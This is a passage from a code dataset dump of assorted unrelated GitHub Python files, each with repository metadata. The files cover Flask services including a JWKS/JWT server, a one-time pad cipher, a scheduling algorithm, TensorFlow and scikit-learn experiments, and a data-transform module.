10/exercise-iris.py","file_name":"exercise-iris.py","file_ext":"py","file_size_in_byte":1592,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"25369617733","text":"import os\nimport random\nfrom datetime import date\n\nfrom flask import Blueprint, Response, request\n\nfrom utils.hellotracks.client import HellotracksClient\nfrom utils.wunder.client import WunderClient\n\nhellotracks = Blueprint(name=\"hellotracks\", import_name=__name__)\n\nht = HellotracksClient(user=os.environ.get(\"HELLOTRACKS_USER\"),\n api_key=os.environ.get(\"HELLOTRACKS_API\"))\nwm = WunderClient(api_key=os.environ.get(\"WUNDER_BACKEND_API_KEY\"))\n\n\n@hellotracks.route('/create_job', methods=['POST'])\ndef create_job():\n event_name = request.json[\"eventName\"]\n data = request.json[\"data\"]\n\n if event_name == \"backend\\\\models\\\\VehicleStateChange::afterInsert\" \\\n and data[\"from\"] != \"fuel level low\" and data[\"to\"] == \"fuel level low\":\n\n vehicle_id = data[\"vehicleId\"]\n vehicle = wm.get_vehicle(vehicle_id=vehicle_id)\n\n if request.args.get(\"random_locations\") == \"1\":\n lat = random.uniform(51.47690572136774, 51.538636920666406)\n lng = random.uniform(-0.18411568297429584, -0.07517897752823008)\n else:\n lat = vehicle.get(\"lat\", 0)\n lng = vehicle.get(\"lon\", 0)\n\n job = ht.create_job_object(\n job_type=0,\n day=int(date.today().strftime('%Y%m%d')),\n destination_lat=lat,\n destination_lng=lng,\n destination_name=\"Fuel Level Low\",\n custom_attributes={\n \"vehicle_id\": vehicle_id,\n \"mileage\": vehicle.get(\"mileage\")\n }\n )\n\n ht.create_jobs(job_list=[job])\n\n return Response(status=200)\n","repo_name":"jduartea/dracaena","sub_path":"blueprints/hellotracks.py","file_name":"hellotracks.py","file_ext":"py","file_size_in_byte":1621,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"42431287101","text":"#!/usr/bin/python\n# encoding: utf-8\n# author: Charles Joly Beauparlant\n# 2015-05-11\n\nimport sys\nimport os\n\nfrom lib.Step import *\n\nclass PeakCall(Step):\n def _set_step_specific_values(self):\n self.name = __name__.split('.')[1]\n self.design_status = True\n\n def _get_command(self, dependencies, outputs):\n command = \"\\tmacs2 callpeak \\\\\\n\"\n command += \"\\t\\t-t \"\n command += \" \".join(dependencies[0].unlist())\n command += \" \\\\\\n\"\n command += \"\\t\\t-c \"\n command += \" \".join(dependencies[1].unlist())\n command += \" \\\\\\n\"\n command += \"\\t\\t-f BAM \\\\\\n\"\n command += \"\\t\\t-g \" + self.params['gsize']\n if self.params['extra'] is not None:\n command += \" \\\\\\n\"\n command += \"\\t\\t\" + self.params['extra']\n return(command)\n\n def _set_default_params(self):\n self.params['dir_name'] = 'peaks'\n self.params['suffix'] = '_peaks.narrowPeak'\n self.params['gsize'] = \"hs\"\n self.params['extra'] = None\n\n def _validate_param_step_specific(self, inputs, outputs):\n pass\n","repo_name":"CharlesJB/MakefileMaker","sub_path":"Steps/PeakCall.py","file_name":"PeakCall.py","file_ext":"py","file_size_in_byte":1105,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"41889120241","text":"from .calculate_dependencies import *\nfrom collections import Counter\nfrom .calculate_base import calculate_base\n\nclass calculate_count(calculate_base):\n \n # counts and reducers\n def count_elements(self,data_I):\n '''count the number of occurances of a elements\n INPUT:\n data_I = list of data with multiple elements\n OUTPUT:\n elements_unique_O = list of unique elements\n elements_count_O = list of feature counts\n elements_count_fraction_O = list of feature counts expressed as a fraction of the total\n '''\n cnt = Counter();\n #count the occurances of the feature\n for d in data_I:\n cnt[d] += 1;\n #extract the unique features and counts\n elements_unique_O = [];\n elements_count_O = [];\n elements_count_fraction_O = [];\n count_sum = sum(cnt.values());\n for element in list(cnt):\n elements_unique_O.append(element);\n elements_count_O.append(cnt[element]);\n elements_count_fraction_O.append(cnt[element]/count_sum);\n return elements_unique_O,elements_count_O,elements_count_fraction_O;\n","repo_name":"dmccloskey/python_statistics","sub_path":"python_statistics/calculate_count.py","file_name":"calculate_count.py","file_ext":"py","file_size_in_byte":1160,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"26311459506","text":"\"\"\"\nCP1404/CP5632 Practical\nData file -> lists program\n\"\"\"\n\nFILENAME = \"subject_data.txt\"\n\n\ndef main():\n longest_length_name=0\n longest_length_students_count=0\n data = get_data()\n print(data)\n for list in data:\n if len(list[1]) > longest_length_name:\n longest_length_name = len(list[1])\n if len(list[2]) > longest_length_students_count:\n longest_length_students_count = len(list[2])\n for list in data:\n print(f\"{list[0]} is taught by {list[1]:<{longest_length_name}} and has {list[2]:>{longest_length_students_count}} students\")\n\n\n\ndef get_data():\n \"\"\"Read data from file formatted like: subject,lecturer,number of students.\"\"\"\n input_file = open(FILENAME)\n list_of_subjects =[]\n for line in input_file:\n line = line.strip()\n line = line.split(\",\")\n list_of_subjects.append(line)\n # print(line) # See what a line looks like\n # print(repr(line)) # See what a line really looks like\n # line = line.strip() # Remove the \\n\n # parts = line.split(',') # Separate the data into its parts\n # print(parts) # See what the parts look like (notice the integer is a string)\n # parts[2] = int(parts[2]) # Make the number an integer (ignore PyCharm's warning)\n # print(parts) # See if that worked\n # print(\"----------\")\n input_file.close()\n return list_of_subjects\n\nmain()","repo_name":"IanEllimanJCU/cp1404practicals","sub_path":"prac_04/subject_reader.py","file_name":"subject_reader.py","file_ext":"py","file_size_in_byte":1413,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"719576828","text":"#coding:utf-8\nimport tensorflow as tf \nimport numpy as np\nimport matplotlib.pyplot as plt #pyhton中输出结果可视化模块\n\n#定义添加神经层的函数def add_layer(),它有四个参数:\n#输入值、输入的大小、输出的大小和激励函数,我们设定默认的激励函数是None\ndef add_layer(inputs,input_size,output_seiz,n_layer,activation_function = None):\t\n\tlayer_name = \"layer%s\" %n_layer\n\twith tf.name_scope(\"layer_name\"):\n\t\t#开始定义weights和biases\n\t\twith tf.name_scope('Weights'):\n\t\t\tWeights = tf.Variable(tf.random_normal([input_size,output_seiz]),name = \"W\")#in_size行, out_size列的随机变量矩阵\n\t\t\ttf.summary.histogram(layer_name+\"/Weights\",Weights) #添加后可以观看变化的变量\n\t\t#机器学习中,biases的推荐值不为0,所以我们这里是在0向量的基础上又加了0.1\n\t\twith tf.name_scope('Biases'):\n\t\t\tbiases = tf.Variable(tf.zeros([1,output_seiz])+0.1,name = \"b\")\n\t\t\ttf.summary.histogram(layer_name+\"/Biases\",biases)\n\t\t#定义神经网络未激活的值。tf.matmul()是矩阵的乘法。\n\t\twith tf.name_scope('Wx_plus_b'):\n\t\t\tWx_plus_b = tf.matmul(inputs,Weights)+biases\n\t\t\ttf.summary.histogram(layer_name+\"/Wx_plus_b\",Wx_plus_b)\n\t\t#当activation_function——激励函数为None时,输出就是当前的预测值——Wx_plus_b,\n\t\t#不为None时,就把Wx_plus_b传到activation_function()函数中得到输出\n\t\tif activation_function is None:\n\t\t\t# None 表示线性关系 无需激励函数\n\t\t\toutput_seiz = Wx_plus_b\n\t\telse:\n\t\t\toutput_seiz = activation_function(Wx_plus_b)\n\n\t\t# 返回输出 添加一个神经层的函数——def add_layer()就定义好了。\n\t\ttf.summary.histogram(layer_name+\"/output_seiz\",output_seiz) #添加后可以观看变化的变量\n\t\treturn output_seiz\n\n\nx_data = np.linspace(-1,1,300)[:,np.newaxis] #-1到1这个区间里有300个单位,维度 二维\nnoise = np.random.normal(0, 0.05, x_data.shape).astype(np.float32) #噪点\ny_data = np.square(x_data)-0.5 #x_data的二次放 - 0.5\n\n#输入\nwith tf.name_scope(\"inputs_layer\"):\n\tx_input = tf.placeholder(tf.float32,[None,1],name = \"x_input\")\n\n\ty_input = tf.placeholder(tf.float32,[None,1],name = \"y_input\")\n\n\n#简单的三层神经网络:\n# 输入层1个神经元 | 隐藏层假设10个神经元 | 输出层1个神经元\n\n#定义隐藏层\nlayer_hint = add_layer(x_input,1,10,n_layer = 1,activation_function = tf.nn.relu)\n\n#定义输出层\nlayer_output = add_layer(layer_hint,10,1,n_layer =2,activation_function = None)\nwith tf.name_scope(\"loss\"):\n\tloss =tf.reduce_mean(tf.reduce_sum(tf.square(y_input - layer_output),reduction_indices=[1]),name = \"loss\")#二者差的平方求和再取平均\n\ttf.summary.scalar(\"loss\",loss)\n\n#每一个练习的步骤 通过 优化器以0.1的学习效率对误差进行更正提升,下一次就会有更好的结果。\nwith tf.name_scope(\"train_step\"):\n\ttrain_step = tf.train.GradientDescentOptimizer(0.1).minimize(loss)\n\n#初始\ninit = tf.global_variables_initializer()\n\nwith tf.Session() as sess:\n\t#合并打包 summary 到文件中\n\tmerged = tf.summary.merge_all()\n\t#把整个框架加载到文件中去,在通过浏览器观看这个文件 sess.graph 收集信息,并放在该文件中\n\twriter = tf.summary.FileWriter(\"logs/\",sess.graph)\n\tsess.run(init)\n\t# #先生成图片框\n\t# fig = plt.figure()\n\t# ax = fig.add_subplot(1,1,1)#做连续性的画图\n\t# #plot上真实数据\n\t# ax.scatter(x_data,y_data)\n\t# plt.ion()\n\t# #打印输出\n\t# plt.show()\n\tfor i in range(1000):\n\t\tsess.run(train_step, feed_dict={x_input:x_data,y_input:y_data})\n\t\tif i% 50:\n\t\t\tresult = sess.run(merged,feed_dict={x_input:x_data,y_input:y_data}) #返回一个 summary \n\t\t\t#将summary 放进 writer 里面\n\t\t\twriter.add_summary(result,i)\n\t\t\t# try:\n\t\t\t# \t#抹去上面一条线\n\t\t\t# \tax.lines.remove(lines[0])\n\t\t\t# except Exception:\n\t\t\t# \tpass\n\t\t\t# #显示出预测数据\n\t\t\t# prediction_value = sess.run(layer_output,feed_dict={x_input:x_data})\n\t\t\t# #通过曲线形式plot上去 宽度为5的红色的线\n\t\t\t# lines = ax.plot(x_data, prediction_value, 'r-', lw=5)\n\t\t\t# #暂停0.1秒\n\t\t\t# plt.pause(0.1)\n\n\t\t\t# print sess.run(loss,feed_dict={x_input:x_data,y_input:y_data})\n\n\n\n","repo_name":"ItVen/MyTensorflow","sub_path":"demo/test_add_layer.py","file_name":"test_add_layer.py","file_ext":"py","file_size_in_byte":4206,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"71586028705","text":"import json\nfrom flask import Flask,Flask,render_template,request,jsonify, url_for\nimport numpy as np\nimport pandas as pd\nimport pickle\n\nproject_app = Flask(__name__)\n\n@project_app.route('/')\ndef index():\n return render_template('project_front.html')\n\n@project_app.route('/user_data',methods = ['POST'])\ndef getting_data():\n data = request.form\n user_name = data['n1']\n user_email = data['e1']\n user_gender = data['G1']\n user_state = data['s1']\n user_age = data['a1']\n user_bmi = float(data['b1'])\n user_childern = data['o1']\n user_smoke = data['y1']\n \n\n data = np.array([user_age,user_gender,user_bmi,user_childern,user_smoke],ndmin=2)\n # age\tsex\tbmi\tchildren\tsmoker\tregion\t\n with open('final_modle.pkl','rb') as file:\n model_final = pickle.load(file)\n\n result_final = np.around(model_final.predict(data),3) \n \n return render_template('haha.html',name=user_name,em=user_email,st=user_state,gn=user_gender,ag=user_age,bm=user_bmi,ch=user_childern,res= result_final[0])\n\n\n\nif __name__ == '__main__':\n project_app.run(host='0.0.0.0',port=8080,debug = True) ","repo_name":"dev-suyash-k/Health_Insurance_Prediction","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1122,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"11949969055","text":"def find_min_days(prices, profit):\n string = []\n for k in profit:\n buyDate = -1\n sellDate = -1\n for i in enumerate(prices):\n if sellDate <= i[0] + 1 and sellDate != -1:\n break\n if (k + i[1]) in prices[(i[0] + 1):]:\n index = prices[(i[0] + 1):].index(k + i[1]) + i[0] + 1\n if buyDate != -1 and sellDate != -1:\n if index + 1 < sellDate or (index + 1 == sellDate and i[0] + 1 > buyDate):\n buyDate = i[0] + 1\n sellDate = index + 1\n else:\n buyDate = i[0] + 1\n sellDate = index + 1\n if buyDate == -1 and sellDate == -1:\n string.append(\"-1\")\n else:\n string.append(str(buyDate) + \" \" + str(sellDate))\n string.append(\",\")\n return \"\".join(string[:-1])\n\n\nn, d = map(int, input().split())\nprices = list(map(int, input().split()))\nprofit = list()\nfor i in range(d):\n profit.append(int(input().strip()))\nanswer = find_min_days(prices, profit)\nprint(answer)\n","repo_name":"JuliaSzymanska/Global-Coding-Challange-2020","sub_path":"Question_3/Python/Question3.py","file_name":"Question3.py","file_ext":"py","file_size_in_byte":1104,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"7"} +{"seq_id":"14374339716","text":"class OneTimePad():\n\n def __init__(self, pad_numbers, plaintext, cipher_id, process):\n validated = self._validate_pad(pad_numbers,\n plaintext,\n cipher_id,\n process)\n self.error = validated['error']\n self.pad_numbers = validated['pad_numbers']\n\n def _validate_pad(self, pad_numbers, text, cipher_id, process):\n '''takes a user-supplied prospective one-time pad and determines its\n validity.\n Returns a dictionary with two keys, `error` and `pad_numbers`.\n If the pad is valid, error will be None and pad_numbers will be the\n values (None can be a valid value for pad_numbers).\n If the pad is invalid, error will be a description of the error and\n pad_numbers will be None\n '''\n # check if pad is blank\n if pad_numbers == '':\n error = None\n pad_numbers = None\n return {'error': error,\n 'pad_numbers': pad_numbers}\n\n # turn comma-separated into list of values\n pad_numbers = [num.strip() for num in pad_numbers.split(',')]\n\n # try to convert the list elements into ints\n try:\n pad_numbers = [int(element) for element in pad_numbers]\n except ValueError:\n error = 'Invalid characters in pad, should only contain ints'\n pad_numbers = None\n return {'error': error,\n 'pad_numbers': pad_numbers}\n\n # check the length is sufficient\n if process == 'e':\n min_length = self._required_pad_length(text, cipher_id)\n else:\n min_length = self._required_pad_length(text, cipher_id, False)\n\n if len(pad_numbers) < min_length:\n error = 'Too short, pad must be at least as long as plaintext'\n pad_numbers = None\n else:\n error = None\n return {'error': error,\n 'pad_numbers': pad_numbers}\n\n def apply_one_time_pad(self, plaintext, cipher, encrypt_mode=True):\n '''reads the object's valid one-time pad (array of ints, at least as\n long as the plaintext) and takes:\n - plaintext (the text that will have the pad applied);\n - cipher (the cipher object - needed to use the cipher functionality);\n - encrypt_mode (True if encrypting, False if decrypting)\n and then returns a new 'plaintext' with the\n pad applied (forward if encrypting, backward if decrypting)\n '''\n valid_characters_and_spaces = cipher._reduce_characters(plaintext)\n\n altered_plaintext = \"\"\n\n numchars = len(valid_characters_and_spaces)\n numvalid = len(cipher.VALID_CHARACTERS)\n\n for character_index in range(numchars):\n pad_index = self.pad_numbers[character_index]\n character = valid_characters_and_spaces[character_index].lower()\n if character in cipher.VALID_CHARACTERS:\n lookup_index = cipher.VALID_CHARACTERS.index(character)\n if encrypt_mode:\n offset_index = (lookup_index + pad_index) % numvalid\n else:\n offset_index = (lookup_index - pad_index) % numvalid\n altered_plaintext += cipher.VALID_CHARACTERS[offset_index]\n elif character in cipher.PASSTHROUGH_CHARACTERS:\n altered_plaintext += character\n\n return altered_plaintext\n\n def _required_pad_length(self, text, cipher_id, encrypt_mode=True):\n '''Determines the minimum required pad length for an algorithm'''\n if encrypt_mode:\n return len(text)\n else: # decrypt\n if cipher_id['name'] in ['ADFGVX', 'Polybius Square']:\n return (len(text) + 1) // 2\n else:\n return len(text)\n\n def __repr__(self):\n if self.error is not None:\n return \"Pad with Error: {}\".format(self.error)\n else:\n return \"Pad: {}\".format(self.pad_numbers)\n","repo_name":"Crossroadsman/treehouse-techdegree-python-project2","sub_path":"one_time_pad.py","file_name":"one_time_pad.py","file_ext":"py","file_size_in_byte":4079,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"25847996863","text":"import datetime\nimport jwt\nimport base64\nfrom flask import Flask, jsonify, request\nfrom cryptography.hazmat.primitives.asymmetric import rsa\nfrom cryptography.hazmat.primitives import serialization\nfrom cryptography.hazmat.backends import default_backend\nfrom cryptography.x509 import load_pem_x509_certificate\n\n# Initialize your Flask app\napp = Flask(__name__)\n\n# Load the private key from your private_key.pem file\nwith open(\"private_keys/private_key.pem\", \"rb\") as private_key_file:\n private_key_str = private_key_file.read()\n\nprivate_key = serialization.load_pem_private_key(\n private_key_str,\n password=None,\n backend=default_backend()\n)\n\n# Load the public key from your public_key.pem file\nwith open(\"python code/public_key.pem\", \"rb\") as public_key_file:\n public_key_str = public_key_file.read()\n\npublic_key = load_pem_x509_certificate(public_key_str, default_backend()).public_key()\n\n# Implement your RESTful JWKS endpoint\n@app.route(\"/.well-known/jwks.json\", methods=[\"GET\"])\ndef jwks():\n # Generate a JWKS response containing your public key\n jwks_response = {\n \"keys\": [\n {\n \"kid\": \"kid1\", # Updated with the actual key ID (kid)\n \"kty\": \"RSA\",\n \"use\": \"sig\",\n \"alg\": \"RS256\",\n \"n\": base64.urlsafe_b64encode(public_key.public_numbers().n.to_bytes(256, \"big\")).rstrip(b\"=\"),\n \"e\": base64.urlsafe_b64encode(public_key.public_numbers().e.to_bytes(3, \"big\")).rstrip(b\"=\")\n }\n ]\n }\n\n return jsonify(jwks_response)\n\n# Implement your /auth endpoint\n@app.route(\"/auth\", methods=[\"POST\"])\ndef authenticate():\n # Get the \"expired\" query parameter\n expired = request.args.get(\"expired\")\n\n if expired:\n # Sign a JWT with the expired private key and expiry\n expiration = datetime.datetime.utcnow() - datetime.timedelta(minutes=1)\n expiration_timestamp = int(expiration.timestamp())\n payload = {\n \"sub\": \"user123\", # Replace with the actual user identifier\n \"exp\": expiration_timestamp\n }\n token = jwt.encode(payload, private_key_str, algorithm=\"RS256\")\n else:\n # Sign a JWT with the current private key\n payload = {\n \"sub\": \"user123\", # Replace with the actual user identifier\n \"exp\": int((datetime.datetime.utcnow() + datetime.timedelta(minutes=30)).timestamp())\n }\n token = jwt.encode(payload, private_key_str, algorithm=\"RS256\")\n\n return jsonify({\"token\": token.decode(\"utf-8\")})\n\n# Run the Flask app on port 8080\nif __name__ == \"__main__\":\n app.run(port=8080)\n","repo_name":"huda13S/jwks-server","sub_path":"jwks_server.py","file_name":"jwks_server.py","file_ext":"py","file_size_in_byte":2649,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"11577210782","text":"import copy\nimport math\n\nimport numpy\n\nimport makespan\nimport task_class\n\n\ndef extract_column(tasks, column_number):\n r_list = []\n for task in tasks:\n r_list.append(task.times[column_number])\n return r_list\n\n\ndef do_schrage(tasks):\n ready_tasks = []\n final_list = []\n unready_tasks = copy.deepcopy(tasks)\n t = min(extract_column(unready_tasks, 0))\n\n while ready_tasks or unready_tasks:\n while unready_tasks and min(extract_column(unready_tasks, 0)) <= t:\n j = numpy.argmin(extract_column(unready_tasks, 0))\n ready_tasks.append(unready_tasks.pop(j))\n if not ready_tasks:\n t = min(extract_column(unready_tasks, 0))\n else:\n j = numpy.argmax(extract_column(ready_tasks, 2))\n final_list.append(ready_tasks.pop(j))\n t += final_list[-1].times[1]\n return makespan.makespan(final_list), final_list\n\n\ndef do_schrage_pmtn(tasks):\n ready_tasks = []\n final_list = []\n unready_tasks = copy.deepcopy(tasks)\n t = 0\n c_max = 0\n q_l = math.inf\n task_l = task_class.Tasks([0, 0, q_l], -1)\n\n while ready_tasks or unready_tasks:\n while unready_tasks and min(extract_column(unready_tasks, 0)) <= t:\n j = numpy.argmin(extract_column(unready_tasks, 0))\n ready_tasks.append(unready_tasks.pop(j))\n if ready_tasks[-1].times[2] > task_l.times[2]:\n task_l.times[1] = t - ready_tasks[-1].times[0]\n t = ready_tasks[-1].times[0]\n if task_l.times[1] > 0:\n ready_tasks.append(task_l)\n if not ready_tasks:\n t = min(extract_column(unready_tasks, 0))\n else:\n j = numpy.argmax(extract_column(ready_tasks, 2))\n task_l = ready_tasks.pop(j)\n t += task_l.times[1]\n c_max = max(c_max, t + task_l.times[2])\n final_list.append(task_l)\n return c_max, final_list\n","repo_name":"schullstel/SPD","sub_path":"Projekt_5/schrage.py","file_name":"schrage.py","file_ext":"py","file_size_in_byte":1948,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"23923302032","text":"\nimport time\nimport torch as th\n\ndef eval_dual(P, u, v, r, c):\n return P.sum() - 1 - (u * r).sum() - (v * c).sum()\n # return P.sum().log() - (u * r).sum() - (v * c).sum()\n\n\ndef round_altschuler(P, r, c):\n X = th.min(r / P.sum(-1), th.ones_like(r))\n X = th.stack([th.diag(X[_]) for _ in range(len(X))])\n P = th.bmm(X, P)\n\n Y = th.min(c / P.sum(-2), th.ones_like(c))\n Y = th.stack([th.diag(Y[_]) for _ in range(len(Y))])\n P = th.bmm(P, Y)\n\n err_r = r - P.sum(-1)\n err_c = c - P.sum(-2)\n P += th.bmm(err_r.unsqueeze(-1), err_c.unsqueeze(-2)) / err_r.norm(p=1, dim=-1, keepdim=True).unsqueeze(-1)\n\n return P\n\n\ndef dual_hessian(P, r_P, c_P):\n B, N, _ = P.size()\n H = th.zeros((B, 2 * N, 2 * N), device=P.device, dtype=P.dtype)\n # Fill the diagonal of H with the concatenation of the row and column sums of P\n H[:, :N, N:] = P\n H[:, N:, :N] = P.transpose(2, 1)\n H = th.diagonal_scatter(H, th.cat([r_P, c_P], dim=-1), dim1=-2, dim2=-1)\n\n return H\n\n\ndef secant_approx_wolfe(df, x0=0., x1=1., c1=1e-3, c2=0.5, max_iter=100):\n logs = {\"f\": {}, \"df\": {}}\n func_cnt = 0\n x1 = x1.item() if isinstance(x1, th.Tensor) else x1\n\n df0 = df(x0)\n df_x0 = df0.clone()\n logs[\"df\"][x0] = df0\n func_cnt += 1\n\n df_x1 = df(x1)\n logs[\"df\"][x1] = df_x1\n func_cnt += 1\n\n if (2 * c1 - 1) * df0 >= df_x1 >= c2 * df0:\n logs[\"func_cnt\"] = func_cnt\n return x1, logs\n\n while df_x1 < 0:\n x0 = x1\n x1 *= 2\n df_x1 = df(x1)\n func_cnt += 1\n logs[\"df\"][x1] = df_x1\n\n if df_x1.isnan():\n raise ValueError(\"NaN encountered.\")\n\n while True:\n x = (x0 * df_x1 - x1 * df_x0) / (df_x1 - df_x0)\n x = (x + (x0 + x1) / 2) / 2\n df_x = df(x)\n func_cnt += 1\n logs[\"df\"][x.item()] = df_x\n if df_x > 0:\n x1 = x\n df_x1 = df_x\n elif df_x < 0:\n x0 = x\n df_x0 = df_x\n\n if (2 * c1 - 1) * df0 >= df_x >= c2 * df0:\n break\n\n if func_cnt > max_iter:\n raise RuntimeError(\"Secant approximate Wolfe line search did not converge.\")\n\n logs[\"func_cnt\"] = func_cnt\n # print(\"Bisection took {:.6f} seconds and {}.\".format(time.time() - start_time, k))\n\n return x, logs\n","repo_name":"adaptive-agents-lab/MDOT-PNCG","sub_path":"utils/algorithmic.py","file_name":"algorithmic.py","file_ext":"py","file_size_in_byte":2288,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"3111358456","text":"# import libraries\nimport os\nimport sys\nimport warnings\nimport lightgbm\nimport numpy as np\nimport pandas\nfrom sklearn.ensemble import RandomForestRegressor\nfrom sklearn.linear_model import ElasticNetCV\nfrom sklearn.linear_model import LassoLarsIC\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.linear_model import Ridge\nfrom sklearn.model_selection import KFold\nfrom sklearn.model_selection import cross_validate\nfrom sklearn.tree import DecisionTreeRegressor\n\n\nclass EvaluateMLModels:\n\n data = None\n n_jobs = None\n models = None\n scoring = None\n attr = None\n\n def __init__(self, data, attr, n_jobs=1):\n\n # requested mandatory parameters\n self.attr = attr\n\n self.data = data\n self.n_jobs = n_jobs\n\n # prepare models\n self.models = [\n ('LR', LinearRegression(n_jobs=self.n_jobs)),\n ('LassoLARS', LassoLarsIC()),\n ('Ridge', Ridge()),\n ('ElasticNet', ElasticNetCV(n_jobs=self.n_jobs)),\n ('LightGBM', lightgbm.sklearn.LGBMRegressor(n_jobs=self.n_jobs)),\n ('CART', DecisionTreeRegressor()),\n ('RandomForest', RandomForestRegressor())\n ]\n\n # prepare scoring metrics\n self.scoring = ['r2', 'neg_mean_squared_error']\n\n def train_single_var(self, yvar):\n\n if not sys.warnoptions:\n warnings.simplefilter(\"ignore\")\n os.environ[\"PYTHONWARNINGS\"] = \"ignore\" # Also affect subprocesses\n\n # subset data\n comb_feat = self.attr + [yvar]\n sub_data = self.data[comb_feat]\n\n # setup X for training\n Xtr = sub_data.iloc[:, 0:len(self.attr)]\n\n # setup Y for training\n Ytr = sub_data.iloc[:, len(self.attr)]\n\n # setup 10-fold CV\n kf = KFold(n_splits=10, shuffle=True)\n\n # scores\n scores = []\n for name, model in self.models:\n\n # get cross validation scores\n sc = cross_validate(estimator=model, X=Xtr, y=Ytr, scoring=self.scoring, cv=kf, n_jobs=self.n_jobs)\n scores.append([name, np.mean(sc['test_r2']), np.mean(sc['test_neg_mean_squared_error'])])\n\n return pandas.DataFrame(scores, columns=['Name', 'R2', 'NegRMSE'])\n","repo_name":"tanash1983/AMPRO-HPCC","sub_path":"EvaluateMLModels.py","file_name":"EvaluateMLModels.py","file_ext":"py","file_size_in_byte":2226,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"79"} +{"seq_id":"41794394876","text":"\"\"\"\nModul mit Funktionen zur Berechnung und Umwandlung von Daten.\n\"\"\"\nimport numbers\nimport re\nfrom collections import Counter\nfrom datetime import datetime\nfrom pydoc import locate\nfrom random import randint\n\nfrom visuanalytics.analytics.control.procedures.step_data import StepData\nfrom visuanalytics.analytics.transform.calculate import CALCULATE_ACTIONS\nfrom visuanalytics.analytics.transform.util.key_utils import get_new_keys, get_new_key\nfrom visuanalytics.analytics.util.step_errors import TransformError, \\\n raise_step_error, StepKeyError\nfrom visuanalytics.analytics.util.step_pattern import data_insert_pattern, data_get_pattern\nfrom visuanalytics.analytics.util.step_utils import execute_type_option, execute_type_compare\nfrom visuanalytics.analytics.util.type_utils import get_type_func, register_type_func\nfrom visuanalytics.util import resources\n\nTRANSFORM_TYPES = {}\n\"\"\"Ein Dictionary bestehend aus allen Transform-Typ-Methoden. \"\"\"\n\n\n@raise_step_error(TransformError)\ndef transform(values: dict, data: StepData):\n \"\"\"Führt die unter `\"type\"` angegebene transform-Funktion als Schleife aus.\n\n :param values: Werte aus der JSON-Datei\n :param data: Daten aus der API\n :return:\n \"\"\"\n for transformation in values[\"transform\"]:\n transformation[\"_loop_states\"] = values.get(\"_loop_states\", {})\n\n trans_func = get_type_func(transformation, TRANSFORM_TYPES)\n\n trans_func(transformation, data)\n\n\ndef register_transform(func):\n \"\"\"Registriert die übergebene Funktion und versieht sie mit einem `\"try/except\"`-Block.\n Fügt eine Typ-Funktion dem Dictionary TRANSFORM_TYPES hinzu.\n\n :param func: die zu registrierende Funktion\n :return: Funktion mit try/except-Block\n \"\"\"\n return register_type_func(TRANSFORM_TYPES, TransformError, func)\n\n\n@register_transform\ndef transform_array(values: dict, data: StepData):\n \"\"\"Führt alle angegebenen `\"transform\"`-Funktionen für alle Werte eines Arrays aus.\n\n :param values: Werte aus der JSON-Datei\n :param data: Daten aus der API\n \"\"\"\n for _ in data.loop_array(data.get_data(values[\"array_key\"], values), values):\n transform(values, data)\n\n\n@register_transform\ndef transform_dict(values: dict, data: StepData):\n \"\"\"Führt alle angegebenen `\"transform\"`-Funktionen für alle Werte eines Dictionaries aus.\n\n :param values: Werte aus der JSON-Datei\n :param data: Daten aus der API\n \"\"\"\n filter = re.compile(values[\"filter_keys\"]) if \"filter_keys\" in values else None\n skip = re.compile(values[\"skip_keys\"]) if \"skip_keys\" in values else None\n\n for idx,_ in data.loop_dict(data.get_data(values[\"dict_key\"], values), values):\n if (filter and not filter.match(idx)) or (skip and skip.match(idx)):\n continue\n transform(values, data)\n\n\n@register_transform\ndef calculate(values: dict, data: StepData):\n \"\"\"Berechnet die angegebene `\"action\"`.\n\n :param values: Werte aus der JSON-Datei\n :param data: Daten aus der API\n \"\"\"\n action_func = get_type_func(values, CALCULATE_ACTIONS, \"action\")\n\n action_func(values, data)\n\n\n@register_transform\ndef select(values: dict, data: StepData):\n \"\"\"Entfernt alle Keys, die nicht in `\"relevant_keys\"` stehen aus dem Dictionary.\n\n :param values: Werte aus der JSON-Datei\n :param data: Daten aus der API\n \"\"\"\n root = values.get(\"_loop_states\", {}).get(\"_loop\", None)\n\n if root is None:\n # If root is data root\n old_root = dict(data.data)\n data.clear_data()\n root = data.data\n else:\n old_root = dict(root)\n root.clear()\n\n for key in values[\"relevant_keys\"]:\n try:\n data_insert_pattern(key, root, data_get_pattern(key, old_root))\n except:\n if values.get(\"ignore_errors\", False) is False:\n raise\n\n\n@register_transform\ndef delete(values: dict, data: StepData):\n \"\"\"\n Löscht die angegebenen Keys aus den daten\n\n :param values: Werte aus der JSON-Datei\n :param data: Daten aus der API\n \"\"\"\n try:\n for idx, key in data.loop_key(values[\"keys\"], values):\n data.remove_data(key, values)\n except:\n pass\n\n\n@register_transform\ndef select_range(values: dict, data: StepData):\n \"\"\"Entfernt alle Werte aus `\"array_key\"`, die nicht in `\"range\"` sind.\n\n :param values: Werte aus der JSON-Datei\n :param data: Daten aus der API\n \"\"\"\n value_array = data.get_data(values[\"array_key\"], values)\n range_start = data.get_data(values.get(\"range_start\", 0), values, int)\n range_end = data.get_data(values[\"range_end\"], values, int)\n\n data.insert_data(values[\"array_key\"], value_array[range_start:range_end], values)\n\n\n@register_transform\ndef append(values: dict, data: StepData):\n 